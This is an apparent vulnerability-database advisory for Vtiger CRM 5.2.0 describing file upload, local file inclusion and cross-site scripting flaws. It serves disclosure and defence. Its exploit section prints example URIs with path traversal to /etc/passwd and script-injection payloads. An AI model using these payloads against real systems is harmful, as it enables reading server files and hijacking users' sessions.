ID

VAR-E-201011-0392


TITLE

Vtiger CRM Multiple Remote Security Vulnerabilities

Trust: 0.3

sources: BID: 44901

DESCRIPTION

Vtiger CRM is prone to an arbitrary-file-upload vulnerability, multiple local file-include vulnerabilities, and multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to upload and execute arbitrary code in the context of the webserver process, view and execute arbitrary local files within the context of the webserver process, steal cookie-based authentication information, execute arbitrary client-side scripts in the context of the browser, and obtain sensitive information. Other attacks are also possible.
Vtiger CRM 5.2.0 is vulnerable; other versions may also be affected.

Trust: 0.3

sources: BID: 44901

AFFECTED PRODUCTS

vendor:vtigermodel:crmscope:eqversion:5.2

Trust: 0.3

sources: BID: 44901

EXPLOIT

Attackers can exploit these issues through a browser. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/vtigercrm/phprint.php?lang_crm=/../[..]/../etc/passwd%00&module=a&action=a&activity_mode=
http://www.example.com/vtigercrm/graph.php?current_language=/../[..]/../etc/passwd%00&module=Accounts&action=Import&parenttab=Support
http://www.example.com/vtigercrm/index.php?module=Users&action=Login&default_user_name=%22%20onmouseover=%22javascript:alert('XSS');
http://www.example.com/vtigercrm/index.php?module=Settings&action=GetFieldInfo&label=%3Cscript%3Ealert(123)%3C/scrip%3E

Trust: 0.3

sources: BID: 44901

PRICE

Free

Trust: 0.3

sources: BID: 44901

TYPE

Input Validation Error

Trust: 0.3

sources: BID: 44901

CREDITS

Giovanni and Alessandro

Trust: 0.3

sources: BID: 44901

EXTERNAL IDS

db:BIDid:44901

Trust: 0.3

sources: BID: 44901

REFERENCES

url:http://www.vtiger.com/index.php

Trust: 0.3

url:http://www.ush.it/team/ush/hack-vtigercrm_520/vtigercrm_520.txt

Trust: 0.3

sources: BID: 44901

SOURCES

db:BIDid:44901

LAST UPDATE DATE

2022-07-27T09:38:24.111000+00:00


SOURCES UPDATE DATE

db:BIDid:44901date:2010-11-17T00:00:00

SOURCES RELEASE DATE

db:BIDid:44901date:2010-11-17T00:00:00